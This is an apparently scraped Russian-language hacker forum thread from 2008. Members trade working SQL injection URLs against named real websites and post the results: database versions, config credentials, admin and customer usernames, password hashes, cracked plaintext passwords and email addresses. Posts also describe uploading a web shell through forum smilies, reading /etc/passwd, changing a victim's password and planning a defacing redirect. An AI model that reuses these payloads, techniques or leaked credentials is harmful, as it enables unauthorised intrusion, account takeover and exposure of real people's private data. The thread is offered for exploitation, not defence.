http://www.romantrahtenberg.ru/catalog/video/element.php?el_id=-19984+union+select+1,2,3,4,5,6,7,8,9,10,11,version (),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32/*
Подобрать не получилось, (((
там 5 колонок
http://www.romantrahtenberg.ru/catalog/video/element.php?el_id=-19984+union+select+1,2,3,4,5/*
гы этж битрикс.... ))
прева b_ , таблы login и пассворд
_http://www.romantrahtenberg.ru/catalog/video/element.php?el_id=-19984+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,AES_DECRYPT(AES_ENCRYPT(CONCAT((SELECT+CON CAT(login,char(59),password)+FROM+b_user+LIMIT+0,1 )),0x71),0x71),18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32/*
admin;5d93ceb70e2bf5daa84ec3d0cd2c731a;qwer1234
Валим в админку .... и через смалики на форуме заливаемс элегантный шелленг:
_http://www.romantrahtenberg.ru/bitrix/images/forum/icon/mod_abble.php.gif
конфиги:
$DBHost = "localhost";
$DBLogin = "trax";
$DBPassword = "8gB1Q83N";
$DBName = "trax";
)) спс.
вывод есть как из комментариев так и в название
шел почемуто не нашол.
http://www.inderscience.com/
Database Version: 4.1.15-Debian_0.dotdeb.4-log
Database name: papers
User name: santiago@localhost
[1]:root:01957ef668e6d197
[2]:root:
[3]:debian-sys-maint:6b67408243591682
[4]:santiago:67988dfe49fa907a
[5]:gringo:6b39e3a056217c98
[6]:idsonsusy:20cc5448310bcc55
[7]:webmaster:11e578da277c0f17
[8]:bizshoe:2bf7d9725ea14fce
http://www.inderscience.com/mapper.php?id=31 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6 A626567696E,LOAD_FILE(0x2F7661722F7777772F61706163 6865322D64656661756C742F6874646F63732F696E6465782E 706870),0x7873716C696E6A656E64),0x71),0x71) LIMIT 1,1/* - чтение сорсов.
Google Page Rank - 7
Calcutta
21.07.2008, 21:07
http://chelzoo.ru/board_more.php?start=3296&rub=-1/**/union/**/select/**/1,concat_ws(0x3a,version(),user())--
4.0.27
chelzooru@localhost
_Pantera_
22.07.2008, 00:58
www.ub.bw PR-6
version() - 5.0.51
file_priv - Y
к сожалению ковычки фильтруются, обходим их с помощью ASCII кодов...
http://www.ub.bw/news.cfm?pid=221&t=-1+union+select+1,2,load_file(char(47,101,116,99,47 ,112,97,115,115,119,100)),4,5,6,7,8,9,10,11,12,13, 14,15+from+mysql.user
http://www.ub.bw/news.cfm?pid=221&t=-1+union+select+1,2,concat(user,char(58),password), 4,5,6,7,8,9,10,11,12,13,14,15+from+mysql.user
root:*605A9A272BF59FE166F769C3536B032DD66858F6
webadmin:*B3AD4B00674739CBE6300BA8A38EBB04C6A1526A
root:*B3AD4B00674739CBE6300BA8A38EBB04C6A1526A
Два рута =)
http://www.adac.org.au/article.php?newsId=99999999945/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11/*
database() = adacorg@64.13.232.25
user() = adac_org_au_-_content
version() = 4.1.11-Debian_4sarge7
вход в админку
www.adac.org.au/intranet.php
не подобрал поле пароля ..
пользователи:
5:jimmy
2:francz
3:helen
4:scott
6:byron
7:katie
8:warren
9:geoff
10:sharon
http://www.adac.org.au/article.php?newsId=99999999945/**/union/**/select/**/1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,userid, username),0x71),0x71),4,5,6,7,8,9,10,11/**/from/**/users/**/limit/**/8,1/*
Vsem prijatnogo vremeni sutak
ja vot nashol forum : http://89.136.42.95
No nekak nemogu razobratsa kak zdelot SQL injection . Moshet ktonibut obesnit
Saiga
Там нельзя ее сделать (вроде) ошибки на главной это просто какие то ошибки с обработкой базы mysql
А вообще тут на против есть тема для вопросов вот туда лучше обратиться
Calcutta
22.07.2008, 21:04
http://www.adac.org.au/article.php?newsId=99999999945/**/union/**/select/**/1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,userid, username,userpass),0x71),0x71),4,5,6,7,8,9,10,11/**/from/**/users/**/limit/**/8,1/*
kaspersky.fr
http://presse.kaspersky.fr/presse.php?type=&article=&bibid=171%20UNION%20SELECT%20AES_DECRYPT(AES_ENCRY PT(CONCAT(0x7873716C696E6A626567696E,TABLE_NAME,0x 7873716C696E6A64656C,TABLE_SCHEMA,0x7873716C696E6A 656E64),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16%20FROM%20INFORMATION_SCHEMA.TABLES%20LIMIT% 2016,1/*
Version:5.0.38
User:adminsql@localhost
Помогите раскрутить инъекцию :)
Calcutta
22.07.2008, 22:08
http://www.zavodmonolit.ru/photos/index.php?id_group=-111/**/union/**/select/**/1,concat_ws(0x3a,table_name)+from+information_sche ma.tables+limit+22,1--
на ваш страх и риск -)
раскрутить не вышло или я что-то не так делаю Х_х
Calcutta
22.07.2008, 22:50
Blind:
http://buymebel.ru/index.php?pl=price&id=18+1,2,3,4,5,6,7--
http://buymebel.ru/index.php?pl=price&id=18+AND+ascii(lower(substring(version(),1,1)))=5 3--
Version: 5.*.*
имя юзера длинной 24 символа. руками подбирать лень >_<
________________________________
http://stroy-grup.ru/index.php?lang_id=1&menu_id=79+AND+ascii(lower(substring(version(),1,1 )))=52--
Version: 4.*.*
________________________________
http://stove.ru/index.php?lng=&rs=116+AND+ascii(lower(substring(version(),1,1)))= 53--
Version: 5.*.*
2 Calcutta
http://www.zavodmonolit.ru/photos/index.php?id_group=-111+UNION+SELECT+1,CONCAT_WS(0x3a,version(),user() ,database())--
Database Version: 5.0.51a-community-nt
Database name: zavodmonolit
User name: zavodmonolit@localhost
http://www.zavodmonolit.ru/photos/index.php?id_group=-111+UNION+SELECT+1,CONCAT_WS(0x3a,user_pass)+FROM+ monolit_users_table+LIMIT+0,1--
http://www.zavodmonolit.ru/admin/login_panel.php adminka
http://www.buymebel.ru/index.php?pl=price&id=18+UNION+SELECT+1,2,3,4,CONCAT_WS(0x3a,version( ),user(),database()),6,7+LIMIT+1,1--
Database Version: 5.0.51a-log
Database name: buymebel_mebel
User name: buymebel_mebel@localhost
смотри получше это не слепая скуля..только в БД нет ничего интересного
http://www.stroy-grup.ru/index.php?lang_id=1&menu_id=79
Database Version: 4.0.27-log
User name: stroygr2_stroygr@localhost
Database name: stroygr2_stroygrup
http://stove.ru/index.php?lng=&rs=116+UNION+SELECT+CONCAT_WS(0x3a,version(),user( ),database()),2,3,4,5,6+LIMIT+1,1/*
Database Version: 5.0.41-log
Database name: stove
User name: stove@jet.mplik.ru
скуля тоже не слепая, так что мудрить с подзапросами не обязательно.Но похвально.Респект тебе чувак :). но в БД опять таки ничего интересного нет..или может я ошибаюсь так как сильно не ковырял..
http://hydrosystems.ro/news.php?id=17+UNION+SELECT+1,AES_DECRYPT(AES_ENCR YPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x 71),0x71),3,4,5,6,7/*
Database Version: 4.1.10a-Max
Database name: usr_web16_1
User name: web16@localhost
Дальше к сожалению не получилось подобрать табелки... кто сможет от меня респект
http://gardenia-antana.com/front/content.php?pr_id=-3+UNION+SELECT+1,CONCAT_WS(0x3a,user(),version(),d atabase()),3,4--
Database Version: 4.1.22-log
Database name: gardenia
User name: gardant@localhost
http://www.news.rallybulgaria.com/news_detail_bg.php?r5=_5&idd=0000000166+UNION+SELECT+1,2,3,4,CONCAT_WS(0x3a ,version(),user(),database()),6,7,8,9,10+LIMIT+1,1
Database Version: 4.1.22-log
Database name: rallyreplay
User name: rallybulgariacom@localhost
http://www.news.rallybulgaria.com/news_detail_bg.php?r5=_5&idd=0000000166+UNION+SELECT+1,2,3,4,CONCAT_WS(0x3a ,id,mail,name,password),6,7,8,9,10+FROM+admins+LIM IT+1,1
0001:the@red.com:ivan:1
0002:redivan@gmail.com:Ivan:red
0003:geshev@rallybulgaria.com:Iasen:123456!
админку не искал...
http://www.gfialomita.ro/detal_presa.php?id=-62'+UNION+SELECT+1,CONCAT_WS(0x3a,user(),version() ,database()),3,4,5/*
Database Version: 4.1.21-log
Database name: gfialomita
User name: root@localhost
http://www.gfialomita.ro/detal_presa.php?id=-62'+UNION+SELECT+1,CONCAT_WS(0x3a,password,user),3 ,4,5+FROM+mysql.user+LIMIT+0,1/*
[0]:7864ed0a46b1e475:root
[1]::root
[2]::
[3]::
[4]::root
[5]:*9CC04D6E974DFC9548D014670AF51FD1856CA3B9:root
[6]::root
[7]::root
[8]::root
[9]:*553DE232FFDE86F5BA68A54C95F97D86569AB6E4:vpopmai luser
[10]::root
[11]::root
[12]:*00A51F3F48415C7D4E8908980D443C29C69B60C9:roundcu be
[13]:*9CC04D6E974DFC9548D014670AF51FD1856CA3B9:root
[14]:*4B9AEA4AAD6DD8F147DDDFECF02E0A8991FC4B8B:spamuse r
[15]:*9CC04D6E974DFC9548D014670AF51FD1856CA3B9:root
Ребят, раскручивайте скули перед тем как сюда постить
всем спасибо
Calcutta
22.07.2008, 23:17
2 Calcutta
смотри получше это не слепая скуля..только в БД нет ничего интересного
всем спасибо
во, точно, не подставил куда надо -)
время уже завно за полночь перевалило, мало что соображаю уже -)
лови "+"
http://www.zavodmonolit.ru/photos/index.php?id_group=-111/**/union/**/select/**/1,concat_ws(0x3a,table_name)+from+information_sche ma.tables+limit+22,1--
на ваш страх и риск -)
раскрутить не вышло или я что-то не так делаю Х_х
Подобрал пасс - zspJDYbBuwODc
Юзера не получиется(
//опередили =\
http://www.line6.ru/info.php?id=-4077'+union+select+1,2,3,concat_ws(0x3a,username,u %20ser_password,user_email),5,6,7,8,9+from+phpbb_u ser%20s/*
Подобрал пасс - zspJDYbBuwODc
Юзера не получиется(
//опередили =\
Это ведь хэш,его еще разшифроваь надо
Cennarios
23.07.2008, 02:30
сурс: http://www.pingpong.su/
5 мускул. Куча таблиц, несколько БД. Где-то среди многочисленных *adm_users* прячется истинный hash на http://www.pingpong.su/admin
Было лень копаться, сделал по phpbb:
http://www.pingpong.su/show_katalog.php?comp_id=-1+union+select+concat(username,0x3a,user_password) +from+phpbb_pingpong_users+limit+1,10/*&action=new
Login: kungpo
password: 59be2a162270a11b949010306c78754f удачно подбрутился: alex5
Пасс админа форума.
Cennarios
23.07.2008, 02:33
Если можно, гуру - гляньте, может шелл где присадить можно ? thx
http://metromir.ru/new_countries.php?id=-7%20union%20select%201,group_concat(table_name,0x3 c62723e),3,4,5%20from%20information_schema.tables/*
http://promtractor.ru.titan.mtw.ru/eng/show_page.php?section=13&id=-5%20union%20select%201,2,3,4,5,6,7,8,9/*
kaspersky.fr
Version:5.0.38
User:adminsql@localhost
Помогите раскрутить инъекцию :)
Форум bb
[2]:admin:4d91567da38be2f1a4058f68e166224e - AMAP
[3]:Gadoux:bf64e931253d69d576b4347ab3d7b7cd
[4]:Johann:fa4e3b741f66e7d4301ddfa7fcecdb18
[5]:Test:098f6bcd4621d373cade4e832627b4f6
[6]:slb:ca50c20f09c7f71a23ebc686c4dcd5fa
[7]:M.Koletzki:d121ef4c27f2bf3510a6a5442ae837f0
[8]:test2:ad0234829205b9033196ba818f7a872b
[9]:nfournier:8eca54c4efaa8603cd3dd729dfa71f2d
[10]:kwchin:554d267fa4ce4351e1c9d89eea37b542
[11]:Franklin:e9646d086a37906e5bec4323d3b37c9b
[12]:Francesco:47000c3c0efa1ef622ac7dbc757fb4c9
[13]:Paul.Gaurd:34b7df049a96890ffcd4bfed6ce21cda
[14]:Fred:e10adc3949ba59abbe56e057f20f883e
[15]:Antony Lai:3716114b005e9b4e533c7f3cd0f4f253
[16]:Marcus:d836f1b5392cf4935752a8745dae1f21
[17]:Achim Flum:15dcad2a4a8242b1e22ab4d80c25ba67
[18]:Michaлl:b991ab37857382709f0ce0cc9e983a59
[19]:Daisuke Gonoi:1c6c80033f18d5af7279ee919b311800
[20]:Kumara:399f1109d5cbb6c918fc08776e1e9331
[21]:engels:42c30e6f00ca3cf18efe60b443692283
[22]:Jim_Lo:ccade42cdcd2f7a4e3b3e0426ad9fccd
[23]:charles79:e5a7f392d933b5bb4830fc6b50e4550e
[24]:MEKKI Mohamed:8f5c853566391602f1a56b305e1d9cd5
[25]:olivier.ako:cfc5adef048746dac83216290dcead5b
[26]:Manfred Hцller:8835b2fbc17349197534c5b78422eb93
[27]:tommychan:17510b05d6334018482e48a458264496
[28]:Nelson:2cb503f370d8c21bab19f472ab4f2dfb
[29]:Albert Lim:9c80993e1e086536e6781baa01f22886
[30]:Emily Su:ac0dd849f94cf31ffd487601cfaa4a41
[31]:Penguin.Zhou:8de531e942e4a5f2df9c57f563953886
[32]:Ajax Chen:aa0ade65f4f6e71ae9894ed98cf26cff
[33]:marc.niederhauser:e86a82e06073ff66d45fd33575c6bf6 2
[34]:Dennis Cho:2f76b398b509709779be8d9fa6bed403
[35]:Jose:350c9d901b7f1c73a481e240ec1b7c0b
[36]:sunny kim:7789f886eeea608c3bf406d1fd656489
[37]:campus_ne:6f2383a03bf27c6109e17c8e2ce48620
[38]:Bellevue:071931c0f79e043e513ce177d255d586
[39]:informatica.madrid:418a49d085d933aef5aa265a82705b d5
[40]:Federico:8f0a20e111a2823f837dd39886fddcb6
[41]:Helge:65ce068e5c9ae2c24b29d470994fe0f9
[42]:Oleg Omelchenko:ebb5041a45ec6db62eb99efc9c8c0b6c
[43]:pappacel:071931c0f79e043e513ce177d255d586
[44]:pensom:fc58b89d7df2a019b6954ef0442efb3f
[45]:imran.faki:273abe22e7ba2307abd83aa4df6e0c1c
[46]:marionshaw:c3dc3962352a2be494bc56c7b7303fa9
[47]:xdeniau:4bdd9eb5c71b2549e03b0e2bf708940e
[48]:mbashar:a51df5ac1124c9ad99cf6c204ea53dec
[49]:coltmer:89244e0f5a920d56d08c82c68b99e876
[50]:JFiliano:f631417f13b0d675a4423863406151fd
[51]:faegerter:d3077f398a81cc537dcac6b4fb2eb9e8
[52]:piaget:1ef12de62937b222cd8a6d321b005245
[53]:Jonathan Leung:ef0cc10ff462af3af3e15f592c4ec8da
[54]:teresa.reid@richemont.com:0259580a1fb2541516a4ba1 6d6f310b3
[55]:matthew monkman:981f12cf3c50cff778d775da904efc2e
[56]:FSA:ac4460f8530e3a4e4e21558badb72a1b
[57]:Laurent.Marguier:655b8d280cd0d52b1e37a4dadb43f9a3
[58]:Chas.lankford:2ce4cf1a4e0776a9c23ddc8fb1087fdc
[59]:michvd:b1b5c11f85ad3b140db3278d580e78dd
[60]:Guillermo Romera:201976bb86f0ca41de07c13243769da0
[61]:Alexei:35cffef36aabe77ecaccefa53a4f5317
[62]:Phil Fei:9479cdbeecb0c3dd1b0a97b7e383e990
[63]:pbadmin:1acf49879500f7a583fc20d2a505c527
[64]:tvos:a01183854d7e784f0455d559f4327d55
[65]:raul.contreras:4c84b0babfd962ec7c6823bd7e9f79bc
[66]:supmei:bf12d41d78a93a7ee50292a25596e4f0
[67]:nicolas.dain:d04f754b95d0615bf285ceae2a476abd
[68]:rcarrer:9a1364050d93fad0642cf2dd46964995
[69]:echrapow:b059c410930aa4f8490259138fc81585
[70]:Yvonne Spruce:9f05aa4202e4ce8d6a72511dc735cce9
[71]:Philippe:d33dc5628def5da84e361f6b889a4ed8
[72]:cshelp@dunhill.com:0e06e290f09e2ed40e482d8b389858 b1
[73]:seamus:aca7ab7d3c004cf4b119cb50e4e17fa7
[74]:florent.pt:67fff3535d17fd2c87b5a4231b5319c9
[75]:MICHEL:5acb5db1d21e997807ed9b02ba32ed34
[76]:hugo.marinho:09b7a8ed41bca894367b6c7881fe7a1c
[77]:mario.leonlaurent:de56c2c4bc0554a08a2e3bf12d358c1 8
[78]:jerome:c6fe7bebba8cc6a2492212adfa89bbd5
[79]:trevor:1cdd28cbda9775ee3746dae8acbd5747
[80]:Admin.Rodriguez:8b24894ba5c97046af2ab72545490fe0
[81]:amireche:5c13f1139c6bcc60756cb8032fd5d3ee
[82]:johann.collot:b8c584820a74d91c41ec856c41562078
================================================== ======
Стало быть админка =\ Поиском не занимался
[1]:9dd3ba637ec2fcaf383415617d39e002:System Administrator - пасс - 180872
==========================================
http://uinc.ru/news/sn10459.html - присоеденимся?)
=========================
[Смысл]
2 t0ox раскручивай скулю по мере возможности...тут есть еще что показать
http://promtractor.ru.titan.mtw.ru/eng/show_page.php?section=13&id=5+UNION+SELECT+1,2,3,4,CONCAT_WS(0x3a,version() ,user(),database()),6,7,8,9/*
Database Version: 4.0.23-standard
Database name: db_promtractor1
User name: promtractor1@localhost
в БД подобрал только табелку news которая нам ничего не дает
<% err_mess1=0 msg=0 if request.form("Send").Count>0 then name=Trim(replace(Request.Form("name"), "'", "’")) mail=Trim(replace(Request.Form("mail"), "'", "’")) if len(name)=0 or len(mail)=0 then err_mess1=1 else 'connection_string="DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" & Server.MapPath("database/gbdb.mdb") & ";" Set Conn1 = Server.CreateObject("ADODB.Connection") Conn1.Open "DRIVER=SQL Server;SERVER=SERVER;UID=sa;APP=Microsoft Open Database Connectivity;WSID=server;DATABASE=promtractor;Netw ork=DBMSSOCN;User Id=sa;PASSWORD=kpangen;" if request.Form("r1")="1" then set rc_check=SErver.createObject("ADODB.RECORDSET") rc_check.open "select * from subscribe where mail='"+mail+"'", conn1 if rc_check.eof then rc_check.close conn1.execute("insert into subscribe (name, mail) values ('"+name+"', '"+mail+"')") msg=1 else rc_check.close msg=3 end if else conn1.execute ("delete from subscribe where mail='"+mail+"'") msg=2 end if conn1.close end if end if if err_mess1>0 or msg=0 then %> <% else response.write " " end if %> Subscription to news Your name*:
вот отсюда тоже можно инфу интересную получить
ну а 2-я твоя скуля интересная..не понимаю зачем выкладывать если ее можно раскрутить по полной, правила читать надо
тИЦ: 550
PR: 4
http://metromir.ru/new_countries.php?id=-7+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5/*
Database Version: 5.1.22-rc
Database User: ramb@localhost
Database Name: 440
В БД много баз:
09_org_ru
09_stat
440
a440
admin
aff
all_stat
bagel
billibg
bussines
cinema
client
clent_adv
client_pay
com
com2
continium_com_ua
country_ochag
crimia
develop
directory
dmoz
dom4u_stat
dom_metromir_stat
UKR_INFO_PHORUM
Ukraine
http://metromir.ru/new_countries.php?id=-7+UNION+SELECT+1,concat_ws(0x3a,email,password),3, 4,5+FROM+bagel.users+LIMIT+1,1/*
[0]:vosi@i.com.ua:202cb962ac59075b964b07152d234b70 : 123
[1]:cedric@loubet.org:a01610228fe998f515a72dd730294d8 7 : 1212
http://metromir.ru/new_countries.php?id=-7+UNION+SELECT+1,concat_ws(0x3a,login,pw),3,4,5+FR OM+billing.users+LIMIT+1,1/*
administrator:40be4e59b9a2a2b5dffb918c0e86b3d7 : welcome
xpgeek:96f8ab2b2f1a9f5d04a4d586ab656c75
и так далее
так как база большая, я сохранил все в файл , кому интересно поковырятся милости просим
click (http://narod.ru/disk/1613257000/metromir.txt.html)
всего доброго вам всем.Удачного дня !
Помогите раскрутить:
http://bikemaster.ru/popup_image1.php?pID=-1'union+select+1,concat(user_name,0x3a,user_passwo rd),3,4,5+from+administrators--
Также:
http://bikemaster.ru/popup_image1.php?pID=-1+union+select+1.2.concat(customers_lastname.0x3a. customers_password.0x3a.customers_email_address).4 .5.6.7.8+from+customers--
Не первый день занимаюсь им. Ничего не выходит(
otmorozok428
23.07.2008, 16:30
РАЗВРАТНЫЕ ПОРНО ФОТО ГАЛЕРЕИ
http://hardru.net/photo/cat/?cat=428+AND+1%3Cascii(substring((version()),1,1))/*
http://hardru.net/photo/cat/?cat=428+AND+1%3Cascii(substring((user()),1,1))/*
http://hardru.net/photo/cat/?cat=428+AND+1%3Cascii(substring((database()),1,1) )/*
version(): 3.23.56-log
user(): hardru@localhost
database(): hardru_net
gismeteo.ru
В антибаяне нет, а так не помню было ли (Не ругаем сильно =) )
_http://avia.gismeteo.ru/avia.php?id=26063+union+select+1,2,3,4,5,6,aes_dec rypt(aes_encrypt(concat_ws(0x3a,version(),database (),user()),0x71),0x71)/*
Версия - 4.1.1-alpha-standard
База - search
Пользователь - root@localhost
2 Snap
http://avia.gismeteo.ru/avia.php?id=26063+UNION+SELECT+CONCAT_WS(0x3a,user ,password),2,3,4,5,6,7+from+mysql.user/*
добавочка..хотя и не интересная
Еще сайтик с погодой
http://www.hmn.ru
Вывод сволоч отсутствует или я где то ошибку допустил.
Таблица и поля подобранны верно.
_http://www.hmn.ru/index1.php?code=1&nn=-1637+union+select+1,concat_ws(login,char(58),passw ord),3,4,5,6,7,8+from+users/*
2 Snap ну если вывода нет, тогда юзаем подзапросы..хоты это геморно, но..надо Федя , надо :)
Version:4.1.20
User:nobody@localhost
Database:test
а вот и хешики
Max:629cf3f287a256ef09d0fe907ca6f8a6
Max1:098f6bcd4621d373cade4e832627b4f6 : test
roman:6ccd26e0cf9a27d3a42eb62257592789: c1492
Pozd:ce6d9e1dc29e7363f338ca0de2b1d75a: ptd
и так далее и тому подобное..подозреваю что есть еще и табелка с юзверями форума..но это уже другая история
otmorozok428
23.07.2008, 18:33
Помогите раскрутить:
http://bikemaster.ru/popup_image1.php?pID=-1'union+select+1,concat(user_name,0x3a,user_passwo rd),3,4,5+from+administrators--
Также:
http://bikemaster.ru/popup_image1.php?pID=-1+union+select+1.2.concat(customers_lastname.0x3a. customers_password.0x3a.customers_email_address).4 .5.6.7.8+from+customers--
Не первый день занимаюсь им. Ничего не выходит(
И не выйдет... Там 3-ий мускул стоит, соответственно всякие подзапросы и юнионы идут лесом. Максимум, что сможешь поднять - инфу из той же табы к которой запрос обращается и то, может быть. Собственно, вот какие инъекции там есть:
http://bikemaster.ru/popup_image1.php?pID=3237'
http://www.bikemaster.ru/popup_image2.php?pID=961'
http://www.bikemaster.ru/popup_image3.php?pID=961'
http://www.bikemaster.ru/popup_image4.php?pID=961'
http://www.bikemaster.ru/popup_image5.php?pID=961'
http://www.bikemaster.ru/popup_image6.php?pID=961'
http://www.bikemaster.ru/default.php?currency=EUR'
http://www.bikemaster.ru/product_vs.php
Я работал с этой:
http://www.bikemaster.ru/default.php?currency=EUR'+and+1/*
http://www.bikemaster.ru/default.php?currency=EUR'+and+1%3Cascii(substring( (version()),1,1))/*
version(): 3.23.58
Если сильно надо - можешь там покопаться, а так - забей лучше...
пример того как умные програмеры хотят обмануть нас смертных что их сайт на хтмл
Constantine: mod_rewrite тебе ни о чем не говорит?
http://www.level.ro/stiri/2753+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT_W S(0x3a,Version(),Database(),User()),0x71),0x71),2/*/tekken_6.html
Database Version: 4.1.21-standard
Database name: level_nou
User name: level@localhost
подобрал табелку user но колонки так и не смог :(
http://autohit.ro/compare.php?modelId1=106+AND+ASCII(SUBSTRING((curr ent_database()),6,1))=xxx--
current_database() : autohit_ro
current_user() : autohit
version(): PostgreSQL
вывода нет, о можно побрутить сиптом, главное запрос правильно составить
не забывайте что тут есть Information_Schema или PG_TABLES
ну и конечно не забывайте что в
PostgreSQL оператор LIMIT сосоит из двух частей: LIMIT и OFFSET
табелки брутить не стал, оставляю это удовольствие вам :)
Cennarios
23.07.2008, 23:45
http://www.2goroda.ru/
http://www.2goroda.ru/News/newsfp.php?n=-1+union+select+1,2,3,4,concat(username,0x3a,user_p assword)%20,6,7,8+from+phpbb_users+limit+4,10/*
Выискиваем: user:magnum pass:6666
меняем пас юзеру Master на 'anus'
Вроде как админка по адресу http://www.2goroda.ru/Poll/admin/index.php
Но таблу так и не подобрал на это дело.
Зы: Впервые вижу такого дибила, который на пасворд '6666' ставит =)
Cennarios
24.07.2008, 00:49
Зы: Можно шуткануть - вставить в новость lo cation.href куда нить на anus.com =)
PandoraBox
24.07.2008, 03:50
http://www.neilprydemaui.com/items.php?id=-48+union+select+1,2,concat_ws(0xEF,version()),4,5, 6,7,8,9,10,11/*
MaSTeR GэN
24.07.2008, 08:46
color-style.ru
http://www.color-style.ru/catalogue.php?sect_id=3+and+substring(version(),1, 1)=5/*
Database Version: 5.0.45-log
Database name: u91786
User name: u91786@10.10.153.164
таблица CUSTOMERS
login:passwd:email
[1]:admin:admin:
[2]:garry:qazzaq:garry@lit.botik.ru
[3]:ivan:ivan:ivan@ivan.com
[4]:nata:1:
[5]:anjelika:anjelika:
[6]:viktor:viktor:kva@mail.cbr.ru
.................................................. .
..................................................
[77]:alisa:alisa:
[78]:alisak:alisak:vitalsson@rambler.ru
[79]:Olga:030393:Smolyaninova_m@mail.ru
[80]:Arinako:Cfytxtr:Arinako@gmail.com
Ксожелению юзер пасс к админке в бд не храняться
(
В добовление к вчерашним Метео сайтам.
Не навиду Метео прогнозы вечно врут гады....
http://www.meteo-tv.ru
(Пожалуй самая популярная программа о погоде. Почти по всем каналам крутят)
http://www.meteo-tv.ru/news/item.php?newsID=-6869+union+select+1,2,concat(login,char(58),passwo rd),4,5,6,7+from+users+limit+1,1/*
admin:40bd001563085fc35165329ea1ff5c5ecbdbbeef
(Ну и форум туда же :) )
http://www.meteo-tv.ru/news/item.php?newsID=-6869+union+select+1,2,concat(username,char(58),use r_password),4,5,6,7+from+forum_users+limit+1,1/*
viking:a37c3645bb4a1ea0f112ad60b8e6a581
--------------------------------------------------------------------------------------------------------------
http://pogoda.ru.net/
(Тут появились некоторые сложности скуля есть, а вот с выводом проблемы нужны подзапросы если правельно мыслю....)
http://pogoda.ru.net/records.php?d=7'+union+select+1,2,3,4,5,6,7,8,9,10 ,11/*
--------------------------------------------------------------------------------------------------------------
http://www.meteo-gid.ru
(Еще один идиотский проэкт http://www.meteo-tv.ru)
С таблицами не стал мучиться если кому будет интересно думаю найдете =)
http://www.meteo-gid.ru/index.php?pageId=3&newsId=382+union+select+1,2,concat(table_name,char (58),column_name,char(58),table_schema),4,5,6,7,8+ from+information_schema.columns+limit+1,1/*
www.agrifoodskills.net.au
user() = agrione@localhost
version() = 4.0.20a-nt
database() = agrirev
http://www.agrifoodskills.net.au/display_announce.php?id=44444444444441/**/union/**/select/**/concat_ws(0x3a,username,password)/**/from/**/users/**/limit/**/0,1/*
count from users = 139
ricktu:e1da02cc31d9a7ffaaf9d759cfe2c8fc
jane:b9a51726733fd31e3b4cd7dfb272f7fa
Justin Lazic:18cdeae7b347cc1518f4537476032435
justin:e10adc3949ba59abbe56e057f20f883e
kateb:2b10435032f537ce08893c0962878796
wendyskelton:e5e7105d5c05d9c0cc5944ff1341b533
...
...
админка = http://www.agrifoodskills.net.au/admin.php
но пароли не подходят :)
там еще и форум есть
K1nD[e]R
24.07.2008, 16:17
http://presse.kaspersky.fr/presse.php?type=&article=&bibid=9999999999+union+select+1,2,3,4,5,6,7,concat _ws(0x2F,name,password),9,10,11,version(),13,14,15 ,16++from+agora.agora_users/*
Mysql: 5.0.38-Dotdeb_1.dotdeb.0-log
User/password : support/9dd3ba637ec2fcaf383415617d39e002
Xcontrol212
24.07.2008, 19:11
http://www.microhydropower.net/news/viewnews.php?ID=-1+union+select+1,USER(),3,4,5,6,7/*
user: renewabl_webuser
имя БД: renewabl_mhpwebsite
но чтоб узнать пасс, надо знать таблу, для этого либо брутить, либбо информационная схема (не робит, ибо старый мускул), либо вручную угадать простые названия))
Зачем брутить?
http://www.microhydropower.net/news/viewnews.php?ID=-1+union+select+1,2,Username,password,5,6,7+from+us ers/*
Бери аккаунт, администраторский или нет - хз. не проверял. Сейчас займусь.
Аккаунт не администраторский.
директория /admin/ защищена.
Значит, есть аналог admin.php либо adm.php(я проверял. 404)
Xcontrol212
24.07.2008, 19:35
Ershik,cкули начал только изучать))
Результаты скинь=)
Вот же ссылка :)
http://www.microhydropower.net/news/viewnews.php?ID=-1+union+select+1,2,Username,password,5,6,7+from+us ers/*
kubu : freedom
Или
http://www.microhydropower.net/news/viewnews.php?ID=-1+union+select+1,2,Username,password,5,6,7+from+us ers+limit+1,1/* и пр.
Пытайся сначала работать по стандартным таблицам.
user, users, admin, admins, и пр.
Если 4 ветка Mysql не факт, что безрезультатно :).
Практикуйся :)
хотел тут хекнуть сайт с марио, но нашол только маеро :)
http://www.mae.ro/index.php?unde=doc&id=-1+union+select+table_name+from+information_schema. tables+limit+50,1
Ps: http://www.mae.ro/admin/
Cennarios
24.07.2008, 23:39
http://www.bmprocess.ru/equipment/fn?id=-1+union+select+username,password+from+u39424.joooo s_users+limit+0,10/*
login:admin
password: c845e471514d11f6b87e8d409efe313e
Не брутится курва =)
sellhouse.com.au
user() = sel7_aGrGOLO@localhost
version() = 4.1.18
database() = agraub9-2
есть таблица мемберс с открытми паролями
count from members = 158
http://sellhouse.com.au/detail.php?property=465555542/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,aes_decrypt(aes_encrypt (concat_ws(0x3a,id,email,password),0x71),0x71),14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52,53,54,55/**/from/**/members/**/limit/**/1,1/*
DimOnOID
25.07.2008, 16:56
http://depts.washington.edu/asuwxpcl/instructors.php?id='-999999+union+select+1,concat(user,password),3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+fro m+mysql.user+LIMIT+1,2/*
http://www.hastings.edu/igsbase/igstemplate.cfm?SRC=DB&SRCN=&GnavID=1+union+select+1,concat(user,0x3a,password) ,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,24,25,26,27,28,29+from+mysql.user+LIMIT+1,6/*
http://texasextension.tamu.edu/agnews/index.php?id=1+union+select+1,concat(user,password ,host),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32+from+mysql .user+LIMIT+13,13/*
мои первые :)
Cennarios
26.07.2008, 11:42
